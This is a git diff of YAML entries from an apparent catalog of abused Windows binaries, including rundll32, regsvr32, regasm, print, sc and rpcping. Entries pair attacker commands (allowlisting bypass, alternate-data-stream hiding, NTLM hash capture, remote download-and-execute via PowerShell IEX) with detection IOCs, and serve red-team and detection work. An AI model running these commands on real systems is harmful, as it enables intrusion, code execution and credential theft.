@ -1,24 +1,44 @@
---
Name: Pcalua.exe
Description: Execute
Author: ''
Description: Program Compatibility Assistant
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: pcalua.exe -a calc.exe
Description: Open the target .EXE using the Program Compatibility Assistant.
Usecase: Proxy execution of binary
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: pcalua.exe -a \\server\payload.dll
Description: Open the target .DLL file with the Program Compatibilty Assistant.
Usecase: Proxy execution of remote dll file
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
Description: Open the target .CPL file with the Program Compatibility Assistant.
Usecase: Execution of CPL files
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\windows\system32\pcalua.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\pcalua.exe
Code Sample:
- Code:
Detection:
- IOC:
Resources:
- https://twitter.com/KyleHanslovan/status/912659279806640128
Notes: |
Thanks to:
fab - @0rbz_
Kyle Hanslovan - @KyleHanslovan
- Link: https://twitter.com/KyleHanslovan/status/912659279806640128
Acknowledgement:
- Person: Kyle Hanslovan
Handle: '@kylehanslovan'
- Person: Fab
Handle: @0rbz_
---

27
yml/OSBinaries/Pcwrun.yml
View File

@ -1,17 +1,26 @@
---
Name: Pcwrun.exe
Description: Execute
Author: ''
Description: Program Compatibility Wizard
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: Pcwrun.exe c:\temp\beacon.exe
Description: Open the target .EXE file with the Program Compatibility Wizard.
Usecase: Proxy execution of binary
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\windows\system32\pcwrun.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\pcwrun.exe
Code Sample:
- Code:
Detection:
- IOC:
Resources:
- https://twitter.com/pabraeken/status/991335019833708544
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
- Link: https://twitter.com/pabraeken/status/991335019833708544
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'
---

35
yml/OSBinaries/Presentationhost.yml
View File

@ -1,19 +1,28 @@
---
Name: PresentationHost.exe
Description: Execute
Author: ''
Name: Presentationhost.exe
Description: File is used for executing Browser applications
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: Presentationhost.exe C:\temp\Evil.xbap
Description: Executes the target XAML Browser Application (XBAP) file.
Description: Executes the target XAML Browser Application (XBAP) file
Usecase: Execute code within xbap files
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- 'c:\windows\system32\PresentationHost.exe '
- 'c:\windows\sysWOW64\PresentationHost.exe '
Code Sample: []
Detection: []
- Path: C:\Windows\System32\Presentationhost.exe
- Path: C:\Windows\SysWOW64\Presentationhost.exe
Code Sample:
- Code:
Detection:
- IOC:
Resources:
- https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
- https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
Notes: Thanks to Casey Smith - @subtee
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---

44
yml/OSBinaries/Print.yml
View File

@ -1,23 +1,45 @@
---
Name: Print.exe
Description: Download, Copy, Add ADS
Author: ''
Description: Used by Windows to send files to the printer
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
Usecase: Hide binary file in alternate data stream to potentially bypass defensive counter measures
Category: Alternate data streams
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe
Description: Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe
Usecase: Copy files
Category: Copy
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe
Description: Copy File.exe from a network share to the target c:\OutFolder\outfile.exe.
Usecase: Copy/Download file from remote server
Category: Copy
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- C:\Windows\System32\print.exe
- C:\Windows\SysWOW64\print.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\print.exe
- Path: C:\Windows\SysWOW64\print.exe
Code Sample:
- Code:
Detection:
- IOC: Print.exe getting files from internet
- IOC: Print.exe creating executable files on disk
Resources:
- https://twitter.com/Oddvarmoe/status/985518877076541440
- https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410
Notes: Thanks to Oddvar Moe - @oddvarmoe
- Link: https://twitter.com/Oddvarmoe/status/985518877076541440
- Link: https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

33
yml/OSBinaries/Reg.yml
View File

@ -1,18 +1,27 @@
---
Name: reg.exe
Description: Export Reg, Add ADS, Import Reg
Author: ''
Name: Reg.exe
Description: Used to manipulate the registry
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
Description: Export the target Registry key and save it to the specified .REG file.
Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream.
Usecase: Hide/plant registry information in Alternate data stream for later use
Category: Alternate data streams
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\windows\system32\reg.exe
- c:\windows\sysWOW64\reg.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\reg.exe
- Path: C:\Windows\SysWOW64\reg.exe
Code Sample:
- Code:
Detection:
- IOC: reg.exe writing to an ADS
Resources:
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Notes: Thanks to Oddvar Moe - @oddvarmoe
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

48
yml/OSBinaries/Regasm.yml
View File

@ -1,25 +1,39 @@
---
Name: Regasm.exe
Description: Execute
Author: ''
Description: Part of .NET
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: regasm.exe /U AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the UnRegisterClass function.
- Command: regasm.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute code and bypass Application whitelisting
Category: AWL bypass
Privileges: User
MitreID: T1121
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: regasm.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute code and bypass Application whitelisting
Category: Execute
Privileges: User
MitreID: T1121
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
Code Sample: []
Detection: []
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
Code Sample:
- Code:
Detection:
- IOC: regasm.exe executing dll file
Resources:
- https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
Notes: Thanks to Casey Smith - @subtee
- Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1121/T1121.md
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---

38
yml/OSBinaries/Regedit.yml
View File

@ -1,20 +1,36 @@
---
Name: regedit.exe
Description: Write ADS, Read ADS, Import registry
Author: ''
Name: Regedit.exe
Description: Used by Windows to manipulate registry
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
Description: Export the target Registry key to the specified .REG file.
Usecase: Hide registry data in alternate data stream
Category: Alternate data streams
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: regedit C:\ads\file.txt:regfile.reg"
Description: Import the target .REG file into the Registry.
Usecase: Import hidden registry data from alternate data stream
Category: Alternate data streams
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- C:\Windows\System32\regedit.exe
- C:\Windows\SysWOW64\regedit.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\regedit.exe
- Path: C:\Windows\SysWOW64\regedit.exe
Code Sample:
- Code:
Detection:
- IOC: regedit.exe reading and writing to alternate data stream
- IOC: regedit.exe should normally not be executed by end-users
Resources:
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Notes: Thanks to Oddvar Moe - @oddvarmoe
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

29
yml/OSBinaries/Register-cimprovider.yml
View File

@ -1,18 +1,27 @@
---
Name: Register-cimprovider.exe
Description: Execute
Author: ''
Description: Used to register new wmi providers
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: Register-cimprovider -path "C:\folder\evil.dll"
Description: Load the target .DLL.
Usecase: Execute code within dll file
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\windows\system32\Register-cimprovider.exe
- c:\windows\sysWOW64\Register-cimprovider.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\Register-cimprovider.exe
- Path: C:\Windows\SysWOW64\Register-cimprovider.exe
Code Sample:
- Code:
Detection:
- IOC:
Resources:
- https://twitter.com/PhilipTsukerman/status/992021361106268161
Notes: Thanks to PhilipTsukerman - @PhilipTsukerman
- Link: https://twitter.com/PhilipTsukerman/status/992021361106268161
Acknowledgement:
- Person: Philip Tsukerman
Handle: '@PhilipTsukerman'
---

44
yml/OSBinaries/Regsvcs.yml
View File

@ -1,23 +1,37 @@
---
Name: Regsvcs.exe
Description: Execute
Author: ''
Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting
Category: Execute
Privileges: User
MitreID: T1121
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting
Category: AWL bypass
Privileges: User
MitreID: T1121
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\regsvcs.exe
- Path: C:\Windows\SysWOW64\regsvcs.exe
Code Sample:
- Code:
Detection:
- IOC:
Resources:
- https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
Notes: Thanks to Casey Smith - @subtee
- Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1121/T1121.md
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---

58
yml/OSBinaries/Regsvr32.yml
View File

@ -1,22 +1,54 @@
---
Name: Regsvr32.exe
Description: Execute
Author: ''
Description: Used by Windows to register dlls
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Description: Execute the specified remote .SCT script with scrobj.dll.
- Commands: regsvr32.exe /s /u /i:file.sct scrobj.dll
Usecase: Execute code from remote scriptlet, bypass Application whitelisting
Category: AWL bypass
Privileges: User
MitreID: T1117
MitreLink: https://attack.mitre.org/wiki/Technique/T1117
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
Description: Execute the specified local .SCT script with scrobj.dll.
Usecase: Execute code from scriptlet, bypass Application whitelisting
Category: AWL bypass
Privileges: User
MitreID: T1117
MitreLink: https://attack.mitre.org/wiki/Technique/T1117
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Description: Execute the specified remote .SCT script with scrobj.dll.
Usecase: Execute code from remote scriptlet, bypass Application whitelisting
Category: Execute
Privileges: User
MitreID: T1117
MitreLink: https://attack.mitre.org/wiki/Technique/T1117
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
Description: Execute the specified local .SCT script with scrobj.dll.
Usecase: Execute code from scriptlet, bypass Application whitelisting
Category: Execute
Privileges: User
MitreID: T1117
MitreLink: https://attack.mitre.org/wiki/Technique/T1117
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- C:\Windows\System32\regsvr32.exe
- C:\Windows\SysWOW64\regsvr32.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\regsvr32.exe
- Path: C:\Windows\SysWOW64\regsvr32.exe
Code Sample:
- Code:
Detection:
- IOC: regsvr32.exe getting files from Internet
- IOC: regsvr32.exe executing scriptlet files
Resources:
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Regsvr32.md
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
- https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
Notes: Thanks to Casey Smith - @subtee
- Link: https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1117/T1117.md
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---

41
yml/OSBinaries/Replace.yml
View File

@ -1,21 +1,36 @@
---
Name: Replace.exe
Description: Copy, Download
Author: ''
Description: Used to replace file with another file
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: replace.exe C:\Source\File.cab C:\Destination /A
Description: Copy the specified file to the destination folder.
Description: Copy file.cab to destination
Usecase: Copy files
Category: Copy
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
Description: Copy the specified file to the destination folder.
Description: Download/Copy bar.exe to outdir
Usecase: Download file
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- C:\Windows\System32\replace.exe
- C:\Windows\SysWOW64\replace.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\replace.exe
- Path: C:\Windows\SysWOW64\replace.exe
Code Sample:
- Code:
Detection:
- IOC: Replace.exe getting files from remote server
Resources:
- https://twitter.com/elceef/status/986334113941655553
- https://twitter.com/elceef/status/986842299861782529
Notes: Thanks to elceef - @elceef
- Link: https://twitter.com/elceef/status/986334113941655553
- Link: https://twitter.com/elceef/status/986842299861782529
Acknowledgement:
- Person: elceef
Handle: '@elceef'
---

40
yml/OSBinaries/Rpcping.yml
View File

@ -1,25 +1,31 @@
---
Name: Rpcping.exe
Description: Credentials
Author: ''
Description: Used to verify rpc connection
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: rpcping -s 127.0.0.1 -t ncacn_np
Description: Send a RPC test connection to the target server (-s) sending the password hash in the process.
- Command: rpcping -s 192.168.1.10 -ncacn_np
Description: Send a RPC test connection to the target server (-s) sending the password hash in the process.
- Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
Usecase: Capture credentials on a non-standard port
Category: Credentials
Privileges: User
MitreID: T1003
MitreLink: https://attack.mitre.org/wiki/Technique/T1003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- C:\Windows\System32\rpcping.exe
- C:\Windows\SysWOW64\rpcping.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\rpcping.exe
- Path: C:\Windows\SysWOW64\rpcping.exe
Code Sample:
- Code:
Detection:
- IOC:
Resources:
- https://twitter.com/subtee/status/872797890539913216
- https://github.com/vysec/RedTips
- https://twitter.com/vysecurity/status/974806438316072960
- https://twitter.com/vysecurity/status/873181705024266241
Notes: Thanks to Casey Smith - @subtee, Vincent Yiu - @vysecurity
- Link: https://github.com/vysec/RedTips
- Link: https://twitter.com/vysecurity/status/974806438316072960
- Link: https://twitter.com/vysecurity/status/873181705024266241
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
- Person: Vincent Yiu
Handle: '@vysecurity'
---

68
yml/OSBinaries/Rundll32.yml
View File

@ -1,32 +1,70 @@
---
Name: Rundll32.exe
Description: Execute, Read ADS
Author: ''
Description: Used by Windows to execute dll files
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: rundll32.exe AllTheThingsx64,EntryPoint
Description: Example command. AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.
Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.
Usecase: Execute dll file
Category: Execute
Privileges: User
MitreID: T1085
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
Usecase: Execute code from Internet
Category: Execute
Privileges: User
MitreID: T1085
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
Usecase: Proxy execution
Category: Execute
Privileges: User
MitreID: T1085
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.
Usecase: Proxy execution
Category: Execute
Privileges: User
MitreID: T1085
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
Usecase: Execute code from Internet
Category: Execute
Privileges: User
MitreID: T1085
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
Usecase: Execute code from alternate data stream
Category: Alternate data streams
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- C:\Windows\System32\rundll32.exe
- C:\Windows\SysWOW64\rundll32.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\rundll32.exe
- Path: C:\Windows\SysWOW64\rundll32.exe
Code Sample:
- Code:
Detection:
- IOC:
Resources:
- https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
- https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
- https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Notes: Thanks to Casey Smith - @subtee
- Link: https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---

34
yml/OSBinaries/Runonce.yml
View File

@ -1,20 +1,28 @@
---
Name: Runonce.exe
Description: Execute
Author: ''
Description:
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: Runonce.exe /AlternateShellStartup
Description: Executes a Run Once Task that has been configured in the registry.
Description: Executes a Run Once Task that has been configured in the registry
Usecase: Persistence, bypassing defensive counter measures
Category: Execute
Privileges: Administrator
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\windows\system32\runonce.exe
- c:\windows\sysWOW64\runonce.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\runonce.exe
- Path: C:\Windows\SysWOW64\runonce.exe
Code Sample:
- Code:
Detection:
- IOC: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY
Resources:
- https://twitter.com/pabraeken/status/990717080805789697
- https://cmatskas.com/configure-a-runonce-task-on-windows/
Notes: |
Thanks to Pierre-Alexandre Braeken - @pabraeken
Requires Administrative access.
- Link: https://twitter.com/pabraeken/status/990717080805789697
- Link: https://cmatskas.com/configure-a-runonce-task-on-windows/
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'
---

31
yml/OSBinaries/Runscripthelper.yml
View File

@ -1,17 +1,28 @@
---
Name: Runscripthelper.exe
Description: Execute
Author: ''
Description:
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
Description: Execute the PowerShell script named test.txt.
Description: Execute the PowerShell script named test.txt
Usecase: Bypass constrained language mode and execute Powershell script
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- 'C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe '
- 'C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe '
Code Sample: []
Detection: []
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
- Path: CC:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
Code Sample:
- Code:
Detection:
- IOC: Event 4014 - Powershell logging
- IOC: Event 400
Resources:
- https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc
Notes: Thanks to Matt Graeber - @mattifestation
- Link: https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc
Acknowledgement:
- Person: Matt Graeber
Handle: '@mattifestation'
---

36
yml/OSBinaries/Sc.yml
View File

@ -1,19 +1,27 @@
---
Name: SC.exe
Description: Execute, Read ADS, Create Service, Start Service
Author: ''
Name: Sc.exe
Description: Used by Windows to manage services
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: |
sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
sc start evilservice
Description: ''
- Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
Description: Creates a new service and executes the file stored in the ADS.
Usecase: Execute binary file hidden inside an alternate data stream
Category: Alternate data streams
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- C:\Windows\System32\sc.exe
- C:\Windows\SysWOW64\sc.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\sc.exe
- Path: C:\Windows\SysWOW64\sc.exe
Code Sample:
- Code:
Detection:
- IOC: Services that gets created
Resources:
- https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
Notes: Thanks to Oddvar Moe - @oddvarmoe
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

42
yml/OSBinaries/Scriptrunner.yml
View File

@ -1,21 +1,37 @@
---
Name: Scriptrunner.exe
Description: Execute
Author: ''
Description:
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
